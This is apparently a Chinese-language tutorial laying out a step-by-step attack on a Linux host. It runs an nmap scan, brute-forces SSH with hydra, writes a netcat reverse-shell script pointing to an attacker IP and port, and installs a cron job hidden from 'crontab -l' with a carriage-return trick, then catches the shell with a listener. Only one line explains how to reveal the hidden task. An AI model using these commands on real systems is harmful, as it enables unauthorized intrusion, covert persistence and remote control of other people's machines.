🔥码云GVP开源项目 12k star Uniapp+ElementUI 功能强大 支持多语言、二开方便! 广告
[TOC] ## 攻击步骤 ### 1、信息收集 * 使用nmap命令对目标主机进行扫描。 ``` nmap -T4 -sT 目标IP地址 ``` * 发现存在 22 ,尝试爆破ssh ### 2、爆破SSH * 使用hydra爆破 ``` hydra -L 用户字典 -P 密码字典 ssh://目标IP ``` ### 3、登陆SSH ``` ssh 目标账户@目标IP ``` ### 4、尝试创建隐藏计划任务 * 进入 /tmp 目录创建 task.sh文件: ``` vim task.sh #!/bin/bash nc 攻击机IP 攻击机端口 -e /bin/bash ``` • 赋予执行权限 ``` chmod +x task.sh ``` * 创建脚本 create\_task.sh: ``` vim  create_task.sh (crontab -l;printf "* * * * * /tmp/task.sh;\rno crontw-wab for whoami %100c\n")|crontab - ``` * 赋予权限,执行 create\_task.sh 脚本 * crontab -l :发现没有任务,定时任务已经隐藏 * 具体任务在 /var/spool/cron/crontabs/ 下查看 * 通过 cat /var/spool/cron/crontabs/root 查看不到任务 * 可以通过 cat -A /var/spool/cron/crontabs/root 查看隐藏的任务 * 或者: cat -vET /var/spool/cron/crontabs/root ### 6、攻击机开启监听 * 开启监听 ``` nc -lvp 对应的 端口 ``` * 发现过了一会就反弹了目标主机的 shell